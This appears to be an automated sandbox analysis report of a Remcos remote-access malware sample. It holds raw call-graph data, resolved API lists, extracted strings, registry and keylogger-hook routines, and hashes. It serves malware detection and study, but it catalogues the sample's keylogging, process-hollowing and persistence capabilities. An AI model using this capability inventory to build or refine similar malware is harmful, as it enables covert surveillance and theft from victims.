48771->48774 48775 401f09 11 API calls 48772->48775 48776 401f09 11 API calls 48773->48776 48777 40dbf8 48774->48777 48778 40db43 48775->48778 48779 40daf1 48776->48779 48780 401f09 11 API calls 48777->48780 48781 401f09 11 API calls 48778->48781 48782 401f09 11 API calls 48779->48782 48783 40dc01 48780->48783 48781->48784 48782->48784 48785 401f09 11 API calls 48783->48785 48784->48753 48786 40dc0a 48785->48786 48787 401f09 11 API calls 48786->48787 48788 40dc13 48787->48788 48788->48357 48789->48368 48790->48391 48792 413742 48791->48792 48793 41371e RegQueryValueExA RegCloseKey 48791->48793 48792->48350 48793->48792 48794->48383 48798 4344ef 48795->48798 48796 43bd51 new 21 API calls 48796->48798 48797 40f0d1 48797->48421 48798->48796 48798->48797 49174 442f80 7 API calls 2 library calls 48798->49174 49175 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48798->49175 49176 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48798->49176 48802->48452 48803->48441 48805->48485 48806->48290 48809 41b4c5 LoadResource LockResource SizeofResource 48808->48809 48810 40f3de 48808->48810 48809->48810 48810->48517 48812 4020b7 28 API calls 48811->48812 48813 406dec 48812->48813 48813->48528 48814->48532 48817 41bfc4 GetCurrentProcess IsWow64Process 48816->48817 48818 41b2d1 48816->48818 48817->48818 48819 41bfdb 48817->48819 48820 4135a6 RegOpenKeyExA 48818->48820 48819->48818 48821 4135d4 RegQueryValueExA RegCloseKey 48820->48821 48822 4135fe 48820->48822 48821->48822 48823 402093 28 API calls 48822->48823 48824 413613 48823->48824 48824->48541 48825->48549 48827 40b90c 48826->48827 48828 402252 11 API calls 48827->48828 48829 40b917 48828->48829 48832 40b92c 48829->48832 48831 40b926 48831->48560 48833 40b966 48832->48833 48834 40b938 48832->48834 48839 4028a4 22 API calls 48833->48839 48835 4027e6 28 API calls 48834->48835 48838 40b942 48835->48838 48838->48831 48841 40a127 48840->48841 48842 413549 3 API calls 
48841->48842 48843 40a12e 48842->48843 48844 40a142 48843->48844 48845 40a15c 48843->48845 48846 409e9b 48844->48846 48847 40a147 48844->48847 48856 40905c 48845->48856 48846->48414 48849 40905c 28 API calls 48847->48849 48851 40a155 48849->48851 48884 40a22d 29 API calls 48851->48884 48854 40a15a 48854->48846 48855->48595 48857 409072 48856->48857 48858 402252 11 API calls 48857->48858 48859 40908c 48858->48859 48860 404267 28 API calls 48859->48860 48861 40909a 48860->48861 48862 40a179 48861->48862 48885 40b8ec 48862->48885 48865 40a1a2 48867 402093 28 API calls 48865->48867 48866 40a1ca 48868 402093 28 API calls 48866->48868 48869 40a1ac 48867->48869 48870 40a1d5 48868->48870 48871 41bc5e 28 API calls 48869->48871 48872 402093 28 API calls 48870->48872 48873 40a1ba 48871->48873 48874 40a1e4 48872->48874 48889 40b164 31 API calls new 48873->48889 48876 41b4ef 80 API calls 48874->48876 48878 40a1e9 CreateThread 48876->48878 48877 40a1c1 48879 401fd8 11 API calls 48877->48879 48880 40a210 CreateThread 48878->48880 48881 40a204 CreateThread 48878->48881 48891 40a27d 48878->48891 48879->48866 48882 401f09 11 API calls 48880->48882 48897 40a289 48880->48897 48881->48880 48894 40a267 48881->48894 48883 40a224 48882->48883 48883->48846 48884->48854 49001 40a273 164 API calls 48884->49001 48886 40b8f5 48885->48886 48887 40a197 48885->48887 48890 40b96c 28 API calls 48886->48890 48887->48865 48887->48866 48889->48877 48890->48887 48900 40a726 48891->48900 48947 40a2b8 48894->48947 48963 40acd6 48897->48963 48901 40a73b Sleep 48900->48901 48921 40a675 48901->48921 48903 40a286 48904 40a77b CreateDirectoryW 48909 40a74d 48904->48909 48905 40a78c GetFileAttributesW 48905->48909 48906 40a7a3 SetFileAttributesW 48906->48909 48907 4020df 11 API calls 48919 40a7ee 48907->48919 48909->48901 48909->48903 48909->48904 48909->48905 48909->48906 48911 401e65 22 API calls 48909->48911 48909->48919 48934 41c3f1 48909->48934 48910 40a81d PathFileExistsW 48910->48919 48911->48909 48912 
4020b7 28 API calls 48912->48919 48914 40a926 SetFileAttributesW 48914->48909 48915 401fe2 28 API calls 48915->48919 48916 406dd8 28 API calls 48916->48919 48917 401fd8 11 API calls 48917->48919 48919->48907 48919->48910 48919->48912 48919->48914 48919->48915 48919->48916 48919->48917 48920 401fd8 11 API calls 48919->48920 48944 41c485 32 API calls 48919->48944 48945 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 48919->48945 48920->48909 48922 40a722 48921->48922 48924 40a68b 48921->48924 48922->48909 48923 40a6aa CreateFileW 48923->48924 48925 40a6b8 GetFileSize 48923->48925 48924->48923 48926 40a6ed FindCloseChangeNotification 48924->48926 48927 40a6ff 48924->48927 48928 40a6e2 Sleep 48924->48928 48929 40a6db 48924->48929 48925->48924 48925->48926 48926->48924 48927->48922 48931 40905c 28 API calls 48927->48931 48928->48926 48946 40b0dc 84 API calls 48929->48946 48932 40a71b 48931->48932 48933 40a179 125 API calls 48932->48933 48933->48922 48935 41c404 CreateFileW 48934->48935 48937 41c441 48935->48937 48938 41c43d 48935->48938 48939 41c461 WriteFile 48937->48939 48940 41c448 SetFilePointer 48937->48940 48938->48909 48942 41c474 48939->48942 48943 41c476 FindCloseChangeNotification 48939->48943 48940->48939 48941 41c458 CloseHandle 48940->48941 48941->48938 48942->48943 48943->48938 48944->48919 48945->48919 48946->48928 48948 40a2d1 GetModuleHandleA SetWindowsHookExA 48947->48948 48949 40a333 GetMessageA 48947->48949 48948->48949 48951 40a2ed GetLastError 48948->48951 48950 40a345 TranslateMessage DispatchMessageA 48949->48950 48961 40a270 48949->48961 48950->48949 48950->48961 48952 41bb8e 28 API calls 48951->48952 48953 40a2fe 48952->48953 48962 4052fd 28 API calls 48953->48962 48965 40ace4 48963->48965 48964 40a292 48965->48964 48966 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48965->48966 48969 401f86 11 API calls 48965->48969 48972 41bae6 GetLastInputInfo GetTickCount 48965->48972 48973 40ad84 GetWindowTextW 
48965->48973 48975 40aedc 48965->48975 48976 40b8ec 28 API calls 48965->48976 48978 40ae49 Sleep 48965->48978 48979 441e81 20 API calls 48965->48979 48981 402093 28 API calls 48965->48981 48982 40add1 48965->48982 48987 403014 28 API calls 48965->48987 48988 406383 28 API calls 48965->48988 48989 41bc5e 28 API calls 48965->48989 48990 40a636 12 API calls 48965->48990 48991 401f09 11 API calls 48965->48991 48992 401fd8 11 API calls 48965->48992 48993 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48965->48993 48994 434770 23 API calls __onexit 48965->48994 48995 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48965->48995 48996 409044 28 API calls 48965->48996 48998 40b97c 28 API calls 48965->48998 48999 40b748 40 API calls 2 library calls 48965->48999 49000 4052fd 28 API calls 48965->49000 48968 40b904 28 API calls 48966->48968 48968->48965 48969->48965 48972->48965 48973->48965 48977 401f09 11 API calls 48975->48977 48976->48965 48977->48964 48978->48965 48979->48965 48981->48965 48982->48965 48985 40905c 28 API calls 48982->48985 48997 40b164 31 API calls new 48982->48997 48985->48982 48987->48965 48988->48965 48989->48965 48990->48965 48991->48965 48992->48965 48994->48965 48995->48965 48996->48965 48997->48982 48998->48965 48999->48965 49007 404353 49002->49007 49004 40430a 49005 403262 11 API calls 49004->49005 49006 404319 49005->49006 49006->48607 49008 40435f 49007->49008 49011 404371 49008->49011 49010 40436d 49010->49004 49012 40437f 49011->49012 49013 404385 49012->49013 49014 40439e 49012->49014 49075 4034e6 28 API calls 49013->49075 49015 402888 22 API calls 49014->49015 49016 4043a6 49015->49016 49018 404419 49016->49018 49019 4043bf 49016->49019 49076 4028a4 22 API calls 49018->49076 49021 4027e6 28 API calls 49019->49021 49030 40439c 49019->49030 49021->49030 49030->49010 49075->49030 49083 43aa9a 49077->49083 49081 4138b9 49080->49081 49082 
41388f RegSetValueExA RegCloseKey 49080->49082 49081->48626 49082->49081 49086 43aa1b 49083->49086 49085 40170d 49085->48624 49087 43aa2a 49086->49087 49088 43aa3e 49086->49088 49092 4405dd 20 API calls _abort 49087->49092 49091 43aa2f __alldvrm __cftof 49088->49091 49093 448957 11 API calls 2 library calls 49088->49093 49091->49085 49092->49091 49093->49091 49095 41b8f9 ctype ___scrt_get_show_window_mode 49094->49095 49096 402093 28 API calls 49095->49096 49097 414f49 49096->49097 49097->48632 49098->48649 49100 414f02 getaddrinfo WSASetLastError 49099->49100 49101 414ef8 49099->49101 49100->48708 49127 414d86 29 API calls ___std_exception_copy 49101->49127 49103 414efd 49103->49100 49128 41b7b6 GlobalMemoryStatusEx 49104->49128 49106 41b7f5 49106->48708 49129 414580 49107->49129 49111 40dda5 49110->49111 49112 4134ff 3 API calls 49111->49112 49114 40ddac 49112->49114 49113 40ddc4 49113->48708 49114->49113 49115 413549 3 API calls 49114->49115 49115->49113 49117 4020b7 28 API calls 49116->49117 49118 41bc57 49117->49118 49118->48708 49119->48708 49121 402093 28 API calls 49120->49121 49122 40f8f6 49121->49122 49122->48708 49123->48708 49124->48708 49126->48708 49127->49103 49128->49106 49132 414553 49129->49132 49133 414568 ___scrt_initialize_default_local_stdio_options 49132->49133 49136 43f79d 49133->49136 49139 43c4f0 49136->49139 49140 43c530 49139->49140 49141 43c518 49139->49141 49140->49141 49143 43c538 49140->49143 49161 4405dd 20 API calls _abort 49141->49161 49162 43a7b7 36 API calls 2 library calls 49143->49162 49144 43c51d __cftof 49154 434fcb 49144->49154 49146 43c548 49163 43cc76 20 API calls 2 library calls 49146->49163 49149 414576 49149->48708 49150 43c5c0 49164 43d2e4 51 API calls 3 library calls 49150->49164 49153 43c5cb 49165 43cce0 20 API calls _free 49153->49165 49155 434fd6 IsProcessorFeaturePresent 49154->49155 49156 434fd4 49154->49156 49158 435018 49155->49158 49156->49149 49166 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter 
GetCurrentProcess TerminateProcess 49158->49166 49160 4350fb 49160->49149 49161->49144 49162->49146 49163->49150 49164->49153 49165->49144 49166->49160 49168->48740 49169->48767 49170->48766 49171->48755 49172->48759 49173->48765 49174->48798 49181 40f7c2 49177->49181 49178 413549 3 API calls 49178->49181 49179 40f866 49183 40905c 28 API calls 49179->49183 49180 40905c 28 API calls 49190 40f7f9 49180->49190 49181->49178 49181->49179 49182 40f856 Sleep 49181->49182 49181->49190 49210 40d096 49181->49210 49182->49181 49184 40f871 49183->49184 49187 41bc5e 28 API calls 49184->49187 49186 41bc5e 28 API calls 49186->49190 49188 40f87d 49187->49188 49298 413814 14 API calls 49188->49298 49190->49180 49190->49182 49190->49186 49192 401f09 11 API calls 49190->49192 49195 402093 28 API calls 49190->49195 49199 41376f 14 API calls 49190->49199 49297 413814 14 API calls 49190->49297 49192->49190 49193 40f890 49194 401f09 11 API calls 49193->49194 49196 40f89c 49194->49196 49195->49190 49197 402093 28 API calls 49196->49197 49198 40f8ad 49197->49198 49200 41376f 14 API calls 49198->49200 49199->49190 49201 40f8c0 49200->49201 49299 412850 TerminateProcess WaitForSingleObject 49201->49299 49203 40f8c8 ExitProcess 49374 4127ee 62 API calls 49208->49374 49300 412850 TerminateProcess WaitForSingleObject 49210->49300 49212 40d0a5 49213 40d0b8 49212->49213 49301 40b8ac TerminateThread 49212->49301 49215 40d0c8 49213->49215 49325 419a94 9 API calls 49213->49325 49217 40d0d1 49215->49217 49218 40d0e2 49215->49218 49326 41c291 9 API calls 49217->49326 49220 413a23 2 API calls 49218->49220 49221 40d108 49218->49221 49220->49221 49222 413a23 2 API calls 49221->49222 49223 40d127 49221->49223 49222->49223 49224 413a23 2 API calls 49223->49224 49225 40d144 ___scrt_get_show_window_mode 49223->49225 49224->49225 49226 4136f8 3 API calls 49225->49226 49227 40d194 49226->49227 49228 40d1ab 49227->49228 49229 40d19b GetModuleFileNameW 49227->49229 49230 40d1b2 RegDeleteKeyA 49228->49230 

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000104), ref: 0040E9EE
                                  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                • String ID: 8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Exe$Exe$Inj$Pj$PSG$Remcos Agent initialized$Rmc-4QQORA$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                • API String ID: 2830904901-759398400
                                • Opcode ID: 14f86f78863529583602f9427b6238619959119db442783aa9dfda20479c072b
                                • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                • Opcode Fuzzy Hash: 14f86f78863529583602f9427b6238619959119db442783aa9dfda20479c072b
                                • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 193c37930fd8eb919b95959c83fa6b3f7d6c848375a171d46b1cd691b6bd1505
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 193c37930fd8eb919b95959c83fa6b3f7d6c848375a171d46b1cd691b6bd1505
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32(?), ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: 351146aa31e7d8f010798953617ef069e45ce016b2dcdd27b6cd7b94982b1026
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: 351146aa31e7d8f010798953617ef069e45ce016b2dcdd27b6cd7b94982b1026
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 4.9.3 Pro$Pj$override$pth_unenc
                                • API String ID: 2281282204-3955947084
                                • Opcode ID: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
